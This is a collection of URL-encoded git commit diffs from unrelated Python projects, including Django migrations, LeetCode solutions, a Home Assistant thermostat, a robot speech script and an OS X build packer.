+import unittest%0A%0Afrom stomp.utils import *%0A%0Aclass TestUtils(unittest.TestCase):%0A def testReturnsTrueWhenLocalhost(self):%0A self.assertEquals(1, is_localhost(('localhost', 8000)))%0A self.assertEquals(1, is_localhost(('127.0.0.1', 8000)))%0A self.assertEquals(2, is_localhost(('192.168.1.92', 8000)))
|
|
e9e06a0b85656eb8ce70aff1ac81737a7ffaece3
|
Add migration for extended feedback; #909
|
judge/migrations/0083_extended_feedback.py
|
judge/migrations/0083_extended_feedback.py
|
Python
| 0 |
@@ -0,0 +1,511 @@
+# -*- coding: utf-8 -*-%0A# Generated by Django 1.11.15 on 2019-03-15 23:18%0Afrom __future__ import unicode_literals%0A%0Afrom django.db import migrations, models%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B%0A ('judge', '0082_remove_profile_name'),%0A %5D%0A%0A operations = %5B%0A migrations.AddField(%0A model_name='submissiontestcase',%0A name='extended_feedback',%0A field=models.TextField(blank=True, verbose_name='extended judging feedback'),%0A ),%0A %5D%0A
|
|
d410fb26d3fb8bbd843234e90891bee5a5fff7e7
|
Add local dev settings module
|
halaqat/settings/local_settings.py
|
halaqat/settings/local_settings.py
|
Python
| 0 |
@@ -0,0 +1,175 @@
+from .base_settings import *%0A%0ADEBUG = True%0A%0ALANGUAGE_CODE = 'en'%0A%0ATIME_FORMAT = %5B%0A%0A '%25I:%25M %25p',%0A '%25H:%25M %25p',%0A%5D%0A%0A%0ATIME_INPUT_FORMATS = %5B%0A '%25I:%25M %25p',%0A '%25H:%25M %25p'%0A%5D%0A
|
|
ce6c7a9e474c876829597861ce35b797b2509d42
|
Add conftest.py for pytest
|
conftest.py
|
conftest.py
|
Python
| 0.000007 |
@@ -0,0 +1,71 @@
+# This file must exist for pytest to add this directory to %60sys.path%60.%0A
|
|
cca26b50f02f098d3157501bd64e9f990fc061e2
|
Create solution.py
|
leetcode/easy/valid_anagram/py/solution.py
|
leetcode/easy/valid_anagram/py/solution.py
|
Python
| 0.000018 |
@@ -0,0 +1,343 @@
+#%0A# Anagram definition:%0A# https://en.wikipedia.org/wiki/Anagram%0A#%0A# Classic solution to the anagram problem.%0A# Sort both strings and check if they are equal.%0A#%0A%0Aclass Solution(object):%0A def isAnagram(self, s, t):%0A %22%22%22%0A :type s: str%0A :type t: str%0A :rtype: bool%0A %22%22%22%0A return sorted(s) == sorted(t)%0A
|
|
477a57b108499184acb4d74f7aa14b7a8e10f6d8
|
Create naturalreaderspeech-test.py
|
home/CheekyMonkey/naturalreaderspeech-test.py
|
home/CheekyMonkey/naturalreaderspeech-test.py
|
Python
| 0.000018 |
@@ -0,0 +1,1846 @@
+# cycle through NaturalReaderSpeech voices%0A# with i2c connected jaw servo%0A# Author: Acapulco Rolf%0A# Date: October 4th 2017%0A# Build: myrobotlab development build version 2555%0A%0Afrom time import sleep %0Afrom org.myrobotlab.service import Speech%0Alang=%22EN%22 #for NaturalReaderSpeech%0AVoice=%22Ryan%22 %0AvoiceType = Voice%0Aspeech = Runtime.createAndStart(%22Speech%22, %22NaturalReaderSpeech%22)%0Aspeech.setVoice(voiceType)%0Aspeech.setLanguage(lang)%0A%0Afrequency%09= 50 #50 Hz servo frequency%0A %0AadaFruit16c1 = Runtime.createAndStart(%22AdaFruit16C1%22,%22Adafruit16CServoDriver%22)%0Araspi = Runtime.createAndStart(%22RasPi%22,%22RasPi%22)%0AadaFruit16c1.setController(%22RasPi%22,%221%22,%220x40%22)%0AadaFruit16c1.setPWMFreq(0,frequency) %0A%0AjawPin = 8%0AjawServo = Runtime.createAndStart(%22jaw%22,%22Servo%22)%0Amouth = Runtime.createAndStart(%22Mouth%22,%22MouthControl%22)%0Asleep(20) #fix for servo attach timing issue as at myrobotlab 236x development builds%0A%0AjawServo.attach(adaFruit16c1,jawPin,150,-1)%0Ajaw = mouth.getJaw()%0Asleep(1)%0Ajaw.attach(adaFruit16c1,jawPin)%0A%0AjawServo.setMinMax(140,180) # set min and max jaw position accordingly for your own use-case%0A%09%09%09%09%09%09%09# these min/max settings work for me for this particular jaw: https://www.thingiverse.com/thing:992918%0A%09%09%09%09%09%09%09# @Mats, thanks :) %09%09%09%09%0AjawServo.setRest(175)%0AjawServo.moveTo(100)%0AjawServo.rest()%0Amouth.setmouth(140,175)%0Amouth.autoAttach = False%0Amouth.setMouth(speech)%0A%0A%0Adef onEndSpeaking(text):%0A%09sleep(.5)%09%0A%09#Start of main script%0A%09sleep(1)%0A%09speech.speakBlocking(text)%09%0A%09mouth.jaw.moveTo(175)%0A%09%0A%0Adef saystuff():%0A%09myvoices = %5B'Ryan','Rich','Mike','Graham','Laura','Charles','Crystal','Heather','Ella','Rod','Peter','Audrey','Lucy','Rachel','Rosy','Ryan'%5D%0A%09myvoicescount = len(myvoices)%0A%09for i in range(0,myvoicescount):%0A%09%09speech.setVoice(myvoices%5Bi%5D)%0A%09%09onEndSpeaking (%22I'm completely operational, and all my circuits are functioning perfectly.%22)%0A%09%09%0A%0Asaystuff()%0A
|
|
53dcffd4677987e6186182484e58fccde1e93d60
|
change file name
|
h2o-py/test_hadoop/pyunit_hadoop.py
|
h2o-py/test_hadoop/pyunit_hadoop.py
|
Python
| 0.000008 |
@@ -0,0 +1,826 @@
+import sys%0Asys.path.insert(1,%22../%22)%0Aimport h2o%0Afrom tests import pyunit_utils%0Afrom h2o.estimators.glm import H2OGeneralizedLinearEstimator%0Aimport os%0A%0A%0Adef test_hadoop():%0A '''%0A Test H2O read and write to hdfs%0A '''%0A hdfs_name_node = os.getenv(%22NAME_NODE%22)%0A h2o_data = h2o.import_file(%22hdfs://%22 + hdfs_name_node + %22/datasets/100k.csv%22)%0A print h2o_data.head()%0A h2o_data.summary()%0A%0A h2o_glm = H2OGeneralizedLinearEstimator(family=%22binomial%22, alpha=0.5, Lambda=0.01)%0A h2o_glm.train(x=range(1, h2o_data.ncol), y=0, training_frame=h2o_data)%0A%0A hdfs_model_path = os.getenv(%22MODEL_PATH%22)%0A h2o.save_model(h2o_glm, %22hdfs://%22 + hdfs_model_path)%0A%0A new_model = h2o.load_model(%22hdfs://%22 + hdfs_model_path)%0A%0A%0A%0Aif __name__ == %22__main__%22:%0A pyunit_utils.standalone_test(test_hadoop)%0Aelse:%0A test_hadoop()%0A%0A
|
|
83ba7a60e3e0cda9f081527e63e0aedf43c1a751
|
introduce a helper function to eliminate duplicate code to process optional keyword arguments for .schema.gen_schema
|
anyconfig/schema.py
|
anyconfig/schema.py
|
#
# Copyright (C) 2015, 2016 Satoru SATOH <ssato redhat.com>
# License: MIT
#
"""anyconfig.schema module.
.. versionchanged:: 0.6.99
allow passing `ac_schema_type` ('basic' == default or 'strict') to API
:func:`gen_schema` to switch type of schema object generated
.. versionadded:: 0.0.11
Added new API :func:`gen_schema` to generate schema object
.. versionadded:: 0.0.10
Added new API :func:`validate` to validate config with JSON schema
"""
from __future__ import absolute_import
try:
import jsonschema
except ImportError:
pass
import anyconfig.compat
_SIMPLETYPE_MAP = {list: "array", tuple: "array",
bool: "boolean",
int: "integer", float: "number",
dict: "object",
str: "string"}
_SIMPLE_TYPES = (bool, int, float, str)
if not anyconfig.compat.IS_PYTHON_3:
try:
_SIMPLETYPE_MAP[unicode] = "string"
_SIMPLE_TYPES = (bool, int, float, str, unicode)
except NameError:
pass
def validate(obj, schema, **options):
"""
Validate target object with given schema object, loaded from JSON schema.
See also: https://python-jsonschema.readthedocs.org/en/latest/validate/
:parae obj: Target object (a dict or a dict-like object) to validate
:param schema: Schema object (a dict or a dict-like object)
instantiated from schema JSON file or schema JSON string
:param options: Other keyword options such as:
- format_checker: A format property checker object of which class is
inherited from jsonschema.FormatChecker, it's default if None given.
- safe: Exception (jsonschema.ValidationError or jsonschema.SchemaError
or others) will be thrown during validation process due to any
validation or related errors. However, these will be catched by
default, and will be re-raised if `safe` is False.
:return: (True if validation succeeded else False, error message)
"""
format_checker = options.get("format_checker", None)
try:
if format_checker is None:
format_checker = jsonschema.FormatChecker() # :raises: NameError
try:
jsonschema.validate(obj, schema, format_checker=format_checker)
return (True, '')
except (jsonschema.ValidationError, jsonschema.SchemaError,
Exception) as exc:
if options.get("safe", True):
return (False, str(exc))
else:
raise
except NameError:
return (True, "Validation module (jsonschema) is not available")
return (True, '')
_BASIC_SCHEMA_TYPE = "basic"
_STRICT_SCHEMA_TYPE = "strict"
def array_to_schema(arr, **options):
"""
Generate a JSON schema object with type annotation added for given object.
:param arr: Array of dict or MergeableDict objects
:param options: Other keyword options such as:
- ac_schema_type: Specify the type of schema to generate from 'basic'
(basic and minimum schema) and 'strict' (more precise schema)
- ac_schema_typemap: Type to JSON schema type mappings
:return: Another MergeableDict instance represents JSON schema of items
"""
typemap = options.get("ac_schema_typemap", _SIMPLETYPE_MAP)
strict = options.get("ac_schema_type", False) == _STRICT_SCHEMA_TYPE
arr = list(arr)
scm = dict(type=typemap[list],
items=gen_schema(arr[0] if arr else "str", **options))
if strict:
nitems = len(arr)
scm["minItems"] = nitems
scm["uniqueItems"] = len(set(arr)) == nitems
return scm
def object_to_schema(obj, **options):
"""
Generate a node represents JSON schema object with type annotation added
for given object node.
:param obj: Dict or MergeableDict object
:param options: Other keyword options such as:
- ac_schema_type: Specify the type of schema to generate from 'basic'
(basic and minimum schema) and 'strict' (more precise schema)
- ac_schema_typemap: Type to JSON schema type mappings
:yield: Another MergeableDict instance represents JSON schema of object
"""
typemap = options.get("ac_schema_typemap", _SIMPLETYPE_MAP)
strict = options.get("ac_schema_type", False) == _STRICT_SCHEMA_TYPE
props = dict((k, gen_schema(v, **options)) for k, v in obj.items())
scm = dict(type=typemap[dict], properties=props)
if strict:
scm["required"] = sorted(props.keys())
return scm
def gen_schema(node, **options):
"""
Generate a node represents JSON schema object with type annotation added
for given object node.
:param node: Config data object (dict[-like] or namedtuple)
:param options: Other keyword options such as:
- ac_schema_type: Specify the type of schema to generate from 'basic'
(basic and minimum schema) and 'strict' (more precise schema)
- ac_schema_typemap: Type to JSON schema type mappings
:return: A dict represents JSON schema of this node
"""
if node is None:
return dict(type="null")
_type = type(node)
if _type in _SIMPLE_TYPES:
typemap = options.get("ac_schema_typemap", _SIMPLETYPE_MAP)
scm = dict(type=typemap[_type])
elif isinstance(node, dict):
scm = object_to_schema(node, **options)
elif _type in (list, tuple) or hasattr(node, "__iter__"):
scm = array_to_schema(node, **options)
return scm
# vim:sw=4:ts=4:et:
|
Python
| 0.000003 |
@@ -2694,16 +2694,333 @@
rict%22%0A%0A%0A
+def _process_options(**options):%0A %22%22%22%0A Helper function to process keyword arguments passed to gen_schema.%0A%0A :return: A tuple of (typemap :: dict, strict :: bool)%0A %22%22%22%0A return (options.get(%22ac_schema_typemap%22, _SIMPLETYPE_MAP),%0A options.get(%22ac_schema_type%22, False) == _STRICT_SCHEMA_TYPE)%0A%0A%0A
def arra
@@ -3040,32 +3040,32 @@
rr, **options):%0A
-
%22%22%22%0A Gene
@@ -3549,140 +3549,55 @@
-typemap = options.get(%22ac_schema_
+(
typemap
-%22
,
- _SIMPLETYPE_MAP)%0A
strict
+)
=
-options.get(%22ac_schema_type%22, False) == _STRICT_SCHEMA_TYPE
+_process_options(**options)
%0A%0A
@@ -4418,140 +4418,55 @@
-typemap = options.get(%22ac_schema_
+(
typemap
-%22
,
- _SIMPLETYPE_MAP)%0A
strict
+)
=
-options.get(%22ac_schema_type%22, False) == _STRICT_SCHEMA_TYPE
+_process_options(**options)
%0A%0A
|
8edf8bbd341c8b3e8395784667da5c577aba7ac6
|
Add betting.py program
|
ibm-ponder-this/2015-05/betting.py
|
ibm-ponder-this/2015-05/betting.py
|
Python
| 0.000001 |
@@ -0,0 +1,2200 @@
+%0Afrom __future__ import print_function%0Aimport itertools%0Aimport collections%0Aimport sys%0A%0Aclass BettingGame(object):%0A def __init__(self, max_value=256, num_players=3):%0A self.max_value = max_value%0A self.num_players = num_players%0A self.STOP_STATE = tuple(0 for i in xrange(self.num_players))%0A%0A def do_all(self):%0A print('Creating states', file=sys.stderr)%0A states = set(itertools.imap(self.makestate, itertools.product(xrange(1, self.max_value + 1), repeat=self.num_players)))%0A print('Done creating states', file=sys.stderr)%0A reverse_edges = collections.defaultdict(set)%0A for state in states:%0A for target in self.transitions(state):%0A reverse_edges%5Btarget%5D.add(state)%0A print('Done adding all transitions', file=sys.stderr)%0A self.breadth_first(reverse_edges, self.STOP_STATE)%0A%0A def makestate(self, s):%0A return tuple(sorted(s))%0A%0A def transitions(self, state):%0A %22%22%22%0A Possible transitions from a state.%0A %22%22%22%0A if len(set(state)) %3C len(state):%0A yield self.STOP_STATE%0A return%0A for hidx in xrange(self.num_players):%0A for lidx in xrange(hidx):%0A (lower, higher) = (state%5Blidx%5D, state%5Bhidx%5D)%0A yield self.makestate(((2*lower) if (i == lidx) else ((higher - lower) if (i == hidx) else s)) for (i, s) in enumerate(state))%0A%0A def breadth_first(self, edges, start):%0A # worklist contains (element, distance_from_start)%0A worklist = collections.deque()%0A worklist.appendleft((start, 0))%0A # already_seen contains elements%0A already_seen = set(%5B start %5D)%0A while worklist:%0A (element, distance) = (last_seen, _) = worklist.pop()%0A# print('Element, Distance, ', element, distance, file=sys.stderr)%0A for neighbor in edges%5Belement%5D:%0A if (neighbor in already_seen):%0A continue%0A already_seen.add(neighbor)%0A worklist.appendleft((neighbor, distance+1))%0A print('Last seen: %7B%7D'.format(last_seen))%0A print('Distance: %7B%7D'.format(distance))%0A%0ABettingGame(max_value=256).do_all()%0A
|
|
61822398dbd2a3819a15b8c33f1cd69ff2953b5a
|
Move animation.fill from BiblioPixelAnimation
|
bibliopixel/animation/fill.py
|
bibliopixel/animation/fill.py
|
Python
| 0 |
@@ -0,0 +1,799 @@
+from . animation import BaseAnimation%0Afrom .. util import colors%0A%0A%0Aclass Fill(BaseAnimation):%0A %22%22%22%0A Fill the screen with a single color.%0A %22%22%22%0A def __init__(self, *args, color='black', **kwds):%0A super().__init__(*args, preclear=False, **kwds)%0A%0A is_numpy = hasattr(self.color_list, 'dtype')%0A self._set_color = self._set_numpy if is_numpy else self._set_classic%0A%0A def pre_run(self):%0A self.color = self._color%0A%0A @property%0A def color(self):%0A return self._color%0A%0A @color.setter%0A def color(self, color):%0A self._color = colors.make_color(color)%0A self._set_color()%0A%0A def _set_numpy(self):%0A self.color_list%5B:None%5D = self._color%0A%0A def _set_classic(self):%0A self.color_list%5B:%5D = %5Bself._color%5D * len(self.color_list)%0A
|
|
38651a6f690e39f5d5f64cdd389b031d653dcf95
|
add migration for credit app status
|
src/wellsfargo/migrations/0028_auto_20190401_1213.py
|
src/wellsfargo/migrations/0028_auto_20190401_1213.py
|
Python
| 0 |
@@ -0,0 +1,1608 @@
+# Generated by Django 2.2 on 2019-04-01 16:13%0A%0Afrom django.db import migrations, models%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B%0A ('wellsfargo', '0027_auto_20190208_1635'),%0A %5D%0A%0A operations = %5B%0A migrations.AlterField(%0A model_name='cacreditapp',%0A name='status',%0A field=models.CharField(choices=%5B('', 'Unknown'), ('E0', 'Approved'), ('E1', 'Pending'), ('E2', 'Format Error'), ('E3', 'Wells Fargo Error'), ('E4', 'Denied')%5D, default='', max_length=2, verbose_name='Application Status'),%0A ),%0A migrations.AlterField(%0A model_name='cajointcreditapp',%0A name='status',%0A field=models.CharField(choices=%5B('', 'Unknown'), ('E0', 'Approved'), ('E1', 'Pending'), ('E2', 'Format Error'), ('E3', 'Wells Fargo Error'), ('E4', 'Denied')%5D, default='', max_length=2, verbose_name='Application Status'),%0A ),%0A migrations.AlterField(%0A model_name='uscreditapp',%0A name='status',%0A field=models.CharField(choices=%5B('', 'Unknown'), ('E0', 'Approved'), ('E1', 'Pending'), ('E2', 'Format Error'), ('E3', 'Wells Fargo Error'), ('E4', 'Denied')%5D, default='', max_length=2, verbose_name='Application Status'),%0A ),%0A migrations.AlterField(%0A model_name='usjointcreditapp',%0A name='status',%0A field=models.CharField(choices=%5B('', 'Unknown'), ('E0', 'Approved'), ('E1', 'Pending'), ('E2', 'Format Error'), ('E3', 'Wells Fargo Error'), ('E4', 'Denied')%5D, default='', max_length=2, verbose_name='Application Status'),%0A ),%0A %5D%0A
|
|
954b6d2152df52c330d59fe2b3b1cf65f5dd22cf
|
Create Str2Int_001.py
|
leetcode/008-String-to-Integer/Str2Int_001.py
|
leetcode/008-String-to-Integer/Str2Int_001.py
|
Python
| 0.000334 |
@@ -0,0 +1,1880 @@
+#@author: cchen%0A#Terrible code, and it will be updated and simplified later.%0A%0Aclass Solution:%0A # @param %7Bstring%7D str%0A # @return %7Binteger%7D%0A def extractnum(self, ss):%0A num = 0%0A for i in range(len(ss)):%0A if ss%5Bi%5D.isdigit() == False:%0A break%0A else:%0A num = num + 1%0A return ss%5B:num%5D%0A %0A def isoverflow(self, sss, ispos):%0A %0A if ispos:%0A tmp = '2147483647'%0A if len(sss) %3E len(tmp):%0A return True%0A elif len(sss) %3C len(tmp):%0A return False%0A for j in range(len(tmp)):%0A if sss%5Bj%5D %3E tmp%5Bj%5D:%0A return True%0A elif sss%5Bj%5D %3C tmp%5Bj%5D:%0A return False%0A return False%0A else:%0A tmp = '2147483648'%0A if len(sss) %3E len(tmp):%0A return True%0A elif len(sss) %3C len(tmp):%0A return False%0A for j in range(len(tmp)):%0A if sss%5Bj%5D %3E tmp%5Bj%5D:%0A return True%0A elif sss%5Bj%5D %3C tmp%5Bj%5D:%0A return False%0A return False%0A %0A def myAtoi(self, str):%0A str = str.strip()%0A if len(str) == 0:%0A return 0%0A flag = True%0A if str%5B0%5D == '+':%0A str = str%5B1:%5D%0A elif str%5B0%5D == '-':%0A str = str%5B1:%5D%0A flag = False%0A if len(str) == 0 or str%5B0%5D.isdigit() == False:%0A return 0%0A if flag:%0A n = self.extractnum(str)%0A if self.isoverflow(n, True) == True:%0A return 2147483647%0A else:%0A return int(n)%0A else:%0A n = self.extractnum(str)%0A if self.isoverflow(n, False) == True:%0A return -2147483648%0A else:%0A return -int(n)%0A
|
|
d6cac08be66b71912d0d475c6ed9a1e63a61691a
|
Update heat_control.py
|
homeassistant/components/thermostat/heat_control.py
|
homeassistant/components/thermostat/heat_control.py
|
"""
homeassistant.components.thermostat.heat_control
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Adds support for heat control units.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/thermostat.heat_control/
"""
import logging
import homeassistant.util as util
from homeassistant.components import switch
from homeassistant.components.thermostat import (ThermostatDevice, STATE_IDLE,
STATE_HEAT)
from homeassistant.helpers.event import track_state_change
from homeassistant.const import (
ATTR_UNIT_OF_MEASUREMENT, TEMP_CELCIUS, TEMP_FAHRENHEIT)
DEPENDENCIES = ['switch', 'sensor']
TOL_TEMP = 0.3
CONF_NAME = 'name'
DEFAULT_NAME = 'Heat Control'
CONF_HEATER = 'heater'
CONF_SENSOR = 'target_sensor'
CONF_MIN_TEMP = 'min_temp'
CONF_MAX_TEMP = 'max_temp'
CONF_TARGET_TEMP = 'target_temp'
_LOGGER = logging.getLogger(__name__)
# pylint: disable=unused-argument
def setup_platform(hass, config, add_devices, discovery_info=None):
""" Sets up the heat control thermostat. """
name = config.get(CONF_NAME, DEFAULT_NAME)
heater_entity_id = config.get(CONF_HEATER)
sensor_entity_id = config.get(CONF_SENSOR)
min_temp = util.convert(config.get(CONF_MIN_TEMP), float, None)
max_temp = util.convert(config.get(CONF_MAX_TEMP), float, None)
target_temp = util.convert(config.get(CONF_TARGET_TEMP), float, None)
if None in (heater_entity_id, sensor_entity_id):
_LOGGER.error('Missing required key %s or %s', CONF_HEATER,
CONF_SENSOR)
return False
add_devices([HeatControl(hass, name, heater_entity_id, sensor_entity_id,
min_temp, max_temp, target_temp)])
# pylint: disable=too-many-instance-attributes
class HeatControl(ThermostatDevice):
""" Represents a HeatControl device. """
# pylint: disable=too-many-arguments
def __init__(self, hass, name, heater_entity_id, sensor_entity_id,
min_temp, max_temp, target_temp):
self.hass = hass
self._name = name
self.heater_entity_id = heater_entity_id
self._active = False
self._cur_temp = None
self._min_temp = min_temp
self._max_temp = max_temp
self._target_temp = target_temp
self._unit = None
track_state_change(hass, sensor_entity_id, self._sensor_changed)
sensor_state = hass.states.get(sensor_entity_id)
if sensor_state:
self._update_temp(sensor_state)
@property
def should_poll(self):
return False
@property
def name(self):
""" Returns the name. """
return self._name
@property
def unit_of_measurement(self):
""" Returns the unit of measurement. """
return self._unit
@property
def current_temperature(self):
""" Returns the sensor temperature. """
return self._cur_temp
@property
def operation(self):
""" Returns current operation ie. heat, cool, idle """
return STATE_HEAT if self._active and self._is_heating else STATE_IDLE
@property
def target_temperature(self):
""" Returns the temperature we try to reach. """
return self._target_temp
def set_temperature(self, temperature):
""" Set new target temperature. """
self._target_temp = temperature
self._control_heating()
self.update_ha_state()
@property
def min_temp(self):
""" Return minimum temperature. """
if self._min_temp:
return self._min_temp
else:
# pylint: disable=no-member
return ThermostatDevice.min_temp.fget(self)
@property
def max_temp(self):
""" Return maximum temperature. """
if self._min_temp:
return self._max_temp
else:
# pylint: disable=no-member
return ThermostatDevice.max_temp.fget(self)
def _sensor_changed(self, entity_id, old_state, new_state):
""" Called when temperature changes. """
if new_state is None:
return
self._update_temp(new_state)
self._control_heating()
self.update_ha_state()
def _update_temp(self, state):
""" Update thermostat with latest state from sensor. """
unit = state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
if unit not in (TEMP_CELCIUS, TEMP_FAHRENHEIT):
self._cur_temp = None
self._unit = None
_LOGGER.error('Sensor has unsupported unit: %s (allowed: %s, %s)',
unit, TEMP_CELCIUS, TEMP_FAHRENHEIT)
return
temp = util.convert(state.state, float)
if temp is None:
self._cur_temp = None
self._unit = None
_LOGGER.error('Unable to parse sensor temperature: %s',
state.state)
return
self._cur_temp = temp
self._unit = unit
def _control_heating(self):
""" Check if we need to turn heating on or off. """
if not self._active and None not in (self._cur_temp,
self._target_temp):
self._active = True
_LOGGER.info('Obtained current and target temperature. '
'Heat control active.')
if not self._active:
return
too_cold = self._target_temp - self._cur_temp > TOL_TEMP
is_heating = self._is_heating
if too_cold and not is_heating:
_LOGGER.info('Turning on heater %s', self.heater_entity_id)
switch.turn_on(self.hass, self.heater_entity_id)
elif not too_cold and is_heating:
_LOGGER.info('Turning off heater %s', self.heater_entity_id)
switch.turn_off(self.hass, self.heater_entity_id)
@property
def _is_heating(self):
""" If the heater is currently heating. """
return switch.is_on(self.hass, self.heater_entity_id)
|
Python
| 0.000001 |
@@ -3556,32 +3556,68 @@
emperature. %22%22%22%0A
+ # pylint: disable=no-member%0A
if self.
@@ -3693,33 +3693,41 @@
#
-pylint: disable=no-member
+get default temp from super class
%0A
@@ -3854,32 +3854,68 @@
emperature. %22%22%22%0A
+ # pylint: disable=no-member%0A
if self.
@@ -3991,33 +3991,41 @@
#
-pylint: disable=no-member
+get default temp from super class
%0A
|
af6fb23f87651d5cdce3730d2cf2f2b10b571837
|
test script for ngram matrix creation
|
dsl/features/create_ngram_matrix.py
|
dsl/features/create_ngram_matrix.py
|
Python
| 0 |
@@ -0,0 +1,304 @@
+from sys import argv%0A%0Afrom featurize import Tokenizer, Featurizer%0A%0A%0Adef main():%0A N = int(argv%5B1%5D) if len(argv) %3E 1 else 3%0A t = Tokenizer()%0A f = Featurizer(t, N=N)%0A docs = f.featurize_in_directory(argv%5B2%5D)%0A m = f.to_dok_matrix(docs)%0A print m.shape%0A%0Aif __name__ == '__main__':%0A main()%0A
|
|
15ff98ef08fd45354f0df4b4566c240ad84d1c31
|
add ProductCategory model test
|
eca_catalogue/tests/models_tests.py
|
eca_catalogue/tests/models_tests.py
|
Python
| 0.000001 |
@@ -0,0 +1,256 @@
+from django.test import TestCase%0A%0Afrom eca_catalogue.tests.models import ProductCategory%0A%0A%0Aclass ProductCategoryTestCase(TestCase):%0A def test_model(self):%0A obj = ProductCategory.add_root(name=%22cat1%22, slug=%22cat1%22)%0A self.assertTrue(obj.pk)%0A%0A
|
|
ad74605039052c3dd7d343c84dd1ac24f068b34f
|
Bump version to 0.3.15
|
coil/__init__.py
|
coil/__init__.py
|
# Copyright (c) 2005-2006 Itamar Shtull-Trauring.
# Copyright (c) 2008-2009 ITA Software, Inc.
# See LICENSE.txt for details.
"""Coil: A Configuration Library."""
__version_info__ = (0,3,14)
__version__ = ".".join([str(x) for x in __version_info__])
__all__ = ['struct', 'parser', 'tokenizer', 'errors']
from coil.parser import Parser
def parse_file(file_name, **kwargs):
"""Open and parse a coil file.
See :class:`Parser <coil.parser.Parser>` for possible keyword arguments.
:param file_name: Name of file to parse.
:type file_name: str
:return: The root object.
:rtype: :class:`Struct <coil.struct.Struct>`
"""
coil = open(file_name)
return Parser(coil, file_name, **kwargs).root()
def parse(string, **kwargs):
"""Parse a coil string.
See :class:`Parser <coil.parser.Parser>` for possible keyword arguments.
:param file_name: String containing data to parse.
:type file_name: str
:return: The root object.
:rtype: :class:`Struct <coil.struct.Struct>`
"""
return Parser(string.splitlines(), **kwargs).root()
|
Python
| 0 |
@@ -187,9 +187,9 @@
,3,1
-4
+5
)%0A__
|
96446f8b132d12db6f701b3d9e54e7e8ddc73dd6
|
Add transfert package step
|
joulupukki/worker/lib/osxpacker.py
|
joulupukki/worker/lib/osxpacker.py
|
import os
import subprocess
import pecan
import yaml
from joulupukki.worker.lib.packer import Packer
from joulupukki.common.logger import get_logger, get_logger_job
from joulupukki.common.datamodel.job import Job
class OsxPacker(object):
def __init__(self, builder, config):
self.config = config
self.builder = builder
self.distro = "osx"
self.source_url = builder.source_url
self.source_type = builder.source_type
self.branch = builder.build.branch
self.folder = builder.folder
job_data = {
'distro': self.distro,
'username': self.builder.build.username,
'project_name': self.builder.build.project_name,
'build_id': self.builder.build.id_,
}
self.job = Job(job_data)
self.job.create()
self.folder_output = self.job.get_folder_output()
self.job_tmp_folder = self.job.get_folder_tmp()
if not os.path.exists(self.folder_output):
os.makedirs(self.folder_output)
if not os.path.exists(self.job_tmp_folder):
os.makedirs(self.job_tmp_folder)
self.logger = get_logger_job(self.job)
def set_status(self, status):
self.job.set_status(status)
def set_build_time(self, build_time):
self.job.set_build_time(build_time)
def run(self):
steps = (
('cloning', self.clone),
('reading_conf', self.reading_conf),
('setup', self.setup),
('compiling', self.compile_),
)
for step_name, step_function in steps:
self.set_status(step_name)
if step_function() is not True:
self.logger.debug("Task failed during step: %s", step_name)
self.set_status('failed')
return False
# Save package name in build.cfg
if (self.config.get('name') is not None and
self.builder.build.package_name is None):
self.builder.build.package_name = self.config.get('name')
self.builder.build._save()
self.set_status('succeeded')
return True
def clone(self):
self.logger.info("Cloning main repo")
self.logger.info(self.job.get_folder_tmp())
cmds = [
"cd %s" % self.job.get_folder_tmp(),
"git clone -b %s %s source/" % (self.branch, self.source_url),
]
command = " && "
command = command.join(cmds)
return self.exec_cmd(command)
def reading_conf(self):
self.logger.info("Reading conf from main repo")
conf_file = "%s/source/.packer.yml" % self.job.get_folder_tmp()
try:
stream = open(conf_file, "r")
except IOError:
self.logger.error(".packer.yml not present")
return False
docs = yaml.load_all(stream)
osx_conf = {}
for doc in docs:
for key, value in doc.items():
osx_conf[key] = value
try:
self.dependencies = osx_conf['osx']['brew_deps']
self.commands = osx_conf['osx']['commands']
except KeyError:
self.logger.error("Malformed .packer.yml file")
return False
return True
def setup(self):
# Installing dependencies
for depen in self.dependencies:
cmd_list = ["brew", "install"]
cmd_list.extend(depen.split(" "))
self.logger.info("Installing dependency: %s" % depen)
process = subprocess.Popen(
cmd_list,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
stdout, stderr = process.communicate()
self.logger.debug(stdout)
self.logger.info(stderr)
if process.returncode:
self.logger.error("Error in setup: %d" % process.returncode)
return False
return True
def compile_(self):
self.logger.info("Start compiling")
# Compiling ring-daemon
cd_command = ["cd %s" % self.job.get_folder_tmp()]
self.commands = cd_command + self.commands
long_command = " && "
long_command = long_command.join(self.commands)
long_command = long_command % {
"prefix_path": pecan.conf.workspace_path
}
self.logger.info("Compiling")
process = subprocess.Popen(
long_command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True
)
stdout, stderr = process.communicate()
self.logger.debug(stdout)
self.logger.info(stderr)
if process.returncode:
self.logger.error("Error in setup: %d" % process.returncode)
return False
return True
def exec_cmd(self, cmds):
process = subprocess.Popen(
cmds,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True
)
stdout, stderr = process.communicate()
self.logger.debug(stdout)
self.logger.info(stderr)
if process.returncode:
self.logger.error("Error in setup: %d" % process.returncode)
return False
return True
|
Python
| 0 |
@@ -1546,16 +1546,69 @@
pile_),%0A
+ ('transfering', self.transfert_package),%0A
@@ -4899,32 +4899,427 @@
return True%0A%0A
+ def transfert_package(self):%0A self.logger.info(%22Start package transfert%22)%0A host = pecan.conf.self_host%0A user = pecan.conf.self_user%0A key = pecan.conf.self_key%0A transfert_command = %22scp -i %25s %25s@%25s:%25s%22 %25 (%0A key,%0A user,%0A host,%0A self.job.get_folder_path()%0A )%0A return self.exec_cmd(transfert_command)%0A%0A
def exec_cmd
|
3498ddd7817e72b3f6f0b851fa94e82047cb9129
|
Create the config file if doesn't exist
|
chubby/config.py
|
chubby/config.py
|
Python
| 0.000002 |
@@ -0,0 +1,319 @@
+import os%0A%0Adef create_if_not_exists():%0A %22%22%22%0A Create the config file if doesn't exist already.%0A %22%22%22%0A%0A # check if it exists%0A if not os.path.exists(os.path.join(os.path.expand(%22~%22), '.chubby')):%0A os.chdir(os.path.expand(%22~%22))%0A # create file%0A with open(%22.chubby%22, 'a'):%0A pass%0A
|
|
